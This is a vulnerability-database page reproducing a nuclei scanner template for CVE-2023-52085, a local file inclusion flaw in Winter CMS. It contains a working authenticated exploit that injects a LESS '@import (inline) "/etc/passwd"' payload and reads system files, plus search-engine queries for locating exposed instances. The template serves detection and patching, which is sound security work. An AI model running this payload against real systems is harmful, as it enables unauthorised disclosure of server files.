Lucene search
K

Winter CMS Local File Inclusion - (LFI)

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 156 Views

Winter CMS ColorPicker FormWidget allows Local File Inclusion (LFI) in v1.2.

Related
Refs
Code
id: CVE-2023-52085

info:
  name: Winter CMS Local File Inclusion - (LFI)
  author: sanineng
  severity: medium
  description: |
    Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.
  impact: |
    Authenticated attackers can include local files via LESS compilation, potentially exposing sensitive file contents and system paths.
  remediation: |
    Upgrade Winter CMS to version 1.2.4 or later.
  reference:
    - https://github.com/wintercms/winter/security/advisories/GHSA-2x7r-93ww-cxrq
    - https://nvd.nist.gov/vuln/detail/CVE-2023-52085
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-52085
    cwe-id: CWE-22
    epss-score: 0.30166
    epss-percentile: 0.97992
    cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: wintercms
    product: winter
    shodan-query:
      - "title:\"Winter CMS\""
      - http.title:"winter cms"
    fofa-query:
      - "title=\"Winter CMS\""
      - title="winter cms"
    google-query: intitle:"winter cms"
  tags: cve,cve2023,authenticated,lfi,wintercms,vuln

http:
  - raw:
      - |
        GET /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _token={{_token}}&postback=1&login={{username}}&password={{password}}

      - |
        POST /backend/system/mailbrandsettings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-WINTER-REQUEST-HANDLER: onSave
        X-WINTER-REQUEST-PARTIALS:
        X-Requested-With: XMLHttpRequest

        _token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0

      - |
        GET /backend/system/mailbrandsettings HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: regex
        part: body_4
        regex:
          - "root:[x*]:0:0:"

    extractors:
      - type: regex
        part: body
        name: _token
        group: 1
        regex:
          - '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
        internal: true
# digest: 4a0a0047304502210083e2b8de71918d6c3691d0f27c7ec6dde9126bd34d53ab8a478abd0cc5cbe64f022056aebda3eb84c8c2bf30f317287d2185580c077b95584435668ae3416df873cc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.13.3 - 5.4
EPSS0.30166
156